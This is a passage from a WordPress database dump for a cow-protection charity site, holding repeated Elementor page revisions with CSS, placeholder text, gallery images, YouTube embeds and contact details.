11:44:34','',1373,'https://gopalak.in/?p=1574',0,'revision','',0),(1575,1,'2022-10-10 17:14:35','2022-10-10 11:44:35','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=XHOmBV4js_Ehttps://www.youtube.com/watch?v=XHOmBV4js_E		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:14:35','2022-10-10 11:44:35','',1373,'https://gopalak.in/?p=1575',0,'revision','',0),(1576,1,'2022-10-10 17:14:35','2022-10-10 11:44:35','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:14:35','2022-10-10 11:44:35','',1373,'https://gopalak.in/?p=1576',0,'revision','',0),(1577,1,'2022-10-10 17:31:47','2022-10-10 12:01:47','','GOPALAK55','','inherit','open','closed','','gopalak55','','','2022-10-10 17:31:47','2022-10-10 12:01:47','',1373,'https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png',0,'attachment','image/png',0),(1579,1,'2022-10-10 17:33:59','2022-10-10 12:03:59','','GOPALAK555','','inherit','open','closed','','gopalak555','','','2022-10-10 17:33:59','2022-10-10 12:03:59','',1373,'https://gopalak.in/wp-content/uploads/2022/10/GOPALAK555.png',0,'attachment','image/png',0),(1580,1,'2022-10-10 17:37:31','2022-10-10 12:07:31','<iframe title=\"Dramatic rescue of injured calf from garbage dump in India.\" width=\"215\" height=\"121\" src=\"https://www.youtube.com/embed/sVQg0-3WSc4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>','','','publish','closed','closed','','c9ffbae56ec1d191f2b5ddcf7669efc7','','','2022-10-10 17:37:31','2022-10-10 12:07:31','',0,'https://gopalak.in/c9ffbae56ec1d191f2b5ddcf7669efc7/',0,'oembed_cache','',0),(1582,1,'2022-10-10 17:49:04','2022-10-10 12:19:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:49:04','2022-10-10 12:19:04','',1373,'https://gopalak.in/?p=1582',0,'revision','',0),(1583,1,'2022-10-10 17:49:04','2022-10-10 12:19:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle 